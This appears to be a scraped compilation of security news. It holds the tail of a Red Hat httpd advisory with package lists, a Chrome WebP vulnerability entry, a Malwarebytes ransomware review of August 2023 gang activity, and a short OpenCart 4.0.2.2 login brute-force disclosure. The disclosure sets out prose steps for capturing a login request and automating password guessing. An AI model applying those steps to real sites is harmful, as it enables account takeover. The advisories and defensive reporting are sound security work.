mod_http2-debugsource-1.15.7-8.module+el8.8.0+18751+b4557bca.3.s390x.rpm  
mod_ldap-2.4.37-56.module+el8.8.0+19808+379766d6.7.s390x.rpm  
mod_ldap-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.s390x.rpm  
mod_md-2.0.8-8.module+el8.3.0+6814+67d1e611.s390x.rpm  
mod_md-debuginfo-2.0.8-8.module+el8.3.0+6814+67d1e611.s390x.rpm  
mod_md-debugsource-2.0.8-8.module+el8.3.0+6814+67d1e611.s390x.rpm  
mod_proxy_html-2.4.37-56.module+el8.8.0+19808+379766d6.7.s390x.rpm  
mod_proxy_html-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.s390x.rpm  
mod_session-2.4.37-56.module+el8.8.0+19808+379766d6.7.s390x.rpm  
mod_session-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.s390x.rpm  
mod_ssl-2.4.37-56.module+el8.8.0+19808+379766d6.7.s390x.rpm  
mod_ssl-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.s390x.rpm

x86_64:  
httpd-2.4.37-56.module+el8.8.0+19808+379766d6.7.x86_64.rpm  
httpd-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.x86_64.rpm  
httpd-debugsource-2.4.37-56.module+el8.8.0+19808+379766d6.7.x86_64.rpm  
httpd-devel-2.4.37-56.module+el8.8.0+19808+379766d6.7.x86_64.rpm  
httpd-tools-2.4.37-56.module+el8.8.0+19808+379766d6.7.x86_64.rpm  
httpd-tools-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.x86_64.rpm  
mod_http2-1.15.7-8.module+el8.8.0+18751+b4557bca.3.x86_64.rpm  
mod_http2-debuginfo-1.15.7-8.module+el8.8.0+18751+b4557bca.3.x86_64.rpm  
mod_http2-debugsource-1.15.7-8.module+el8.8.0+18751+b4557bca.3.x86_64.rpm  
mod_ldap-2.4.37-56.module+el8.8.0+19808+379766d6.7.x86_64.rpm  
mod_ldap-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.x86_64.rpm  
mod_md-2.0.8-8.module+el8.3.0+6814+67d1e611.x86_64.rpm  
mod_md-debuginfo-2.0.8-8.module+el8.3.0+6814+67d1e611.x86_64.rpm  
mod_md-debugsource-2.0.8-8.module+el8.3.0+6814+67d1e611.x86_64.rpm  
mod_proxy_html-2.4.37-56.module+el8.8.0+19808+379766d6.7.x86_64.rpm  
mod_proxy_html-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.x86_64.rpm  
mod_session-2.4.37-56.module+el8.8.0+19808+379766d6.7.x86_64.rpm  
mod_session-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.x86_64.rpm  
mod_ssl-2.4.37-56.module+el8.8.0+19808+379766d6.7.x86_64.rpm  
mod_ssl-debuginfo-2.4.37-56.module+el8.8.0+19808+379766d6.7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-27522  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk/2WvAAoJENzjgjWX9erEwNIQAJT3Z5g7zf8ToSVPTonGVjyY  
wwV+lEom64cjglZa7zr4hZHjKNeih5qvBQfysR6Ar1fmwOQwjuRA6IPYhEBmzv9a  
iAvo66RMKUC9BXhQa25FAaSIz+6nsMq6g3oz/T+oeVBFOYx+uLaNZWFaE0c4NC/x  
mmVJpsRU3SQ4cGIGM6T63htcSn9Gv4ONpx33FBrC/231LeHr0x1kD7FQXi3ltjFA  
bJKRl7drIzPDLjjdLK5Vwc9HG1ChVBKU2+YWtMoqZTxoofGNe1iecERpA/Bo6o/D  
Ni8LfOzXxrxAfG3XYZxR/QSRYdUuJhdPPFpaiNAGonyBSUHAbv4tpaPP621ZFKk+  
2bqoYg2NuRuPzrzrtJrlyaqD0LlcGbGuXuReIObMTHmF2VQkP4326tACBkwwQyik  
lsImvHLxRj3jX9Nh0RIoJIUBX5LrpM6Tl6sS164KbsjM3T1+WNXZbxNCK7K2qvpu  
J09arnRalQ2dgzSc3ruodJc5WN4GWkJw9uW2hj1t85xgWwM8RxxrkezvsWvANZVi  
6bZeYV40lzvMJ2fZp02RUPjuBaApLfFY5ho2RkCqv5cHwxQNgPBeEvr2zzL4OBPT  
M22u3SvCgy6xupnlCNUiZF/fA+CWWAEXb6oTWYFSi8NQJ6RW7mBMrVzH5YXuXOBI  
B2wfLpXRnRWsereqgu++  
=oXyU  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5050-01

Heap buffer overflow in WebP in Google Chrome prior to 116.0.5845.187 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: Critical)

**libwebp: OOB write in BuildHuffmanTable**

Moderate severity GitHub Reviewed Published Sep 12, 2023 to the GitHub Advisory Database • Updated Sep 14, 2023

GHSA-j7hp-h8jx-5ppr: libwebp: OOB write in BuildHuffmanTable

**Why is this Chrome CVE included in the Security Update Guide?**

The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. Please see Security Update Guide Supports CVEs Assigned by Industry Partners for more information.

**How can I see the version of the browser?**

1.  In your Microsoft Edge browser, click on the 3 dots (...) on the very right-hand side of the window
2.  Click on **Help and Feedback**
3.  Click on **About Microsoft Edge**

CVE-2023-4863: Chromium: CVE-2023-4863 Heap buffer overflow in WebP

CVE-2023-4863

Categories: Threat Intelligence
Ransomware news in August was highlighted by the sudden fall of CL0P from the list of the monthly most active gangs, while Lockbit returned to the number one spot.



(Read more...)




The post Ransomware review: September 2023 appeared first on Malwarebytes Labs.

_This article is based on research by Marcelo Rivero, Malwarebytes' ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, "known attacks" are those where the victim **did not** pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher._

Ransomware news in August was highlighted by the sudden fall of CL0P from the list of the most active gangs in any given month, while Lockbit returned to the number one spot after a steady four-month decline in activity.

CL0P published the data of just four victims on their leak site last month, down from 91known victims in June and 170 known victims in July. In June, CL0p shot to the top of the charts due to their use of a zero-day exploit in MOVEit Transfer, with victims of those attacks continuing to be posted into July.

This dramatic decrease isn’t too surprising given that CL0P’s vulnerability-focused approach to attacking has diminishing returns. As more organizations became aware of and patched the zero-day that CL0P discovered, CL0P's zero-day campaign saw less and less momentum, with fewer at-risk targets. We witnessed a similar trend earlier this year when, after targeting 104 victims using a GoAnywhere MFT zero-day, CL0P’s presence almost vanished in April and May, as organizations presumably caught on and patched the vulnerability.

Lockbit, on the other hand, posted a total of a 124 victims on its leak site last month to reclaim its usual number one spot on the monthly charts. Before this sudden increase in attacks, we had been observing an average decrease of 20 attacks a month from the group since April 2023.

Known ransomware attacks by gang, August 2023

Known ransomware attacks by country, August 2023

Known ransomware attacks by industry sector, August 2023

We speculated on reasons for the downward trend in last month’s review, such as it being possibly related to a recent affiliate arrest, but interesting research published last month may also hold the clue to other answers.

In the third installation of his “Ransomware Diaries” series, researcher Jon DiMaggio reveals the extent of Lockbit's alleged internal instability, including how its apparent storage limitations and slow response times have led to affiliates leaving it for competitors. If more frustrated clientelle are leaving Lockbit than before, then it could be a novel, possible explanation to any monthly dips in activity.

To get a better idea of the true strength of Lockbit’s current operations, however, we can compare any period of decline to their typical number of monthly attacks. Data stretching back to March 2022, for example, places their median number of attacks at around 67 a month. From April 2023 to July 2023, their median number of attacks was actually slightly higher than this at 69 attacks a month, making the decline seem less substantial. In other words, while Lockbit might be plagued by internal instability at the moment, the effect of this on their monthly numbers seems insignificant in the long-run.

Contrasting with LockBit's storage server challenges, the recent move by CL0P last month to use torrents underscores the evolving tactics ransomware gangs employ to circumvent storage limitations.

As ransomware gangs steal data from major companies, the scale of the information requires immense storage capacities. Traditional cloud services like AWS and Azure not only come with high costs but also demand personal identifiable information (PII) and credit card details upon registration—information that can easily be subpoenaed by law enforcement. A torrenting service, on the other hand, optimizes downloads by sourcing data from multiple proximate locations, rather than a lone server.

Since torrenting necessitates the data be scattered across all participating nodes in the peer-to-peer network, ransomware gangs can bypass the challenges of storage and bandwidth while also better evading law enforcement. Additionally, if more top ransomware gangs can follow CL0p's footsteps and start to rely more on torrents to distribute stolen data, victims may feel increased pressure to pay ransoms as their data becomes more widely available. 

**Newcomers****CloAk**

CloAk is a relatively new ransomware group that emerged between late 2022 and the beginning of 2023. In August 2023 the group published the data of 25 victims, mostly from Europe and with a special focus on Germany.

The CloAk leak site

**Metaencryptor**

Metaencryptor is a new ransomware gang that published the data of 12 victims in August 2023.

The Metaencryptor leak site

**RansomedVC**

RansomedVC is a new group that published the data of nine victims on its leak site last month. The group has adopted a favorite ideology of other ransomware actors—that they are serving as nothing more than "pen-testers"—and added a twist, alleging that any vulnerabilities they have found in victims' networks must also be reported under compliance to Europe's General Data Protection Regulation (GDPR). RansomedVC has advertised themselves as a "digital tax for peace" service and threatened victims with data breach fines if the ransom isn't paid.

The RansomedVC leak site

**INC Ransom **

INC Ransom is a newcomer to the ransomware scene last month that published three victims to its leak site in August.

The INC Ransomware leak site

**How to avoid ransomware**

*   **Block common forms of entry**. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
*   **Detect intrusions**. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption**. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups**. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Ransomware review: September 2023

OpenCart v4.0.2.2 is vulnerable to Brute Force Attack.

    # Exploit Title: OpenCart CMS v4.0.2.2 Login Vulnerability# Date: 5-9-2023# Category: Web Application [CMS]# Exploit Author: Rajdip Dey Sarkar# Version: 4.0.2.2# Tested on: Windows/Kali# CVE: CVE-2023-40834Description:----------------OpenCart CMS version 4.0.2.2 is susceptible to login brute-force attacks,where attackers can repeatedly try to guess login credentials without anyprotective mechanisms in place.Vulnerable Parameter:-----------------------`Password`Steps to reproduce:---------------------> Initial Login Attempt: An attacker visits the login page `http://localhost/opencart-4.0.2.2/index.php?route=account/login&language=en-gb`<http://localhost/opencart-4.0.2.2/index.php?route=account/login&language=en-gb>andenters a valid username along with an incorrect password to trigger anauthentication attempt.> Request Capture: The attacker intercepts the HTTP request sent to theserver during the failed login attempt using tools like proxy servers. Thiscaptured request contains the authentication details.> Request Modification: The attacker uses a tool like "Intruder" toautomate the process of submitting multiple password variations. Theymodify the captured request to include different passwords, including thecorrect one, to be used in the brute force attack.> Brute Force Attack: The attacker launches the brute force attack bysending the modified requests with different password combinations to theserver. They analyze the responses to identify differences in responselengths or messages that reveal the correct password, account lockoutinformation, or other vulnerabilities.

Tag

#web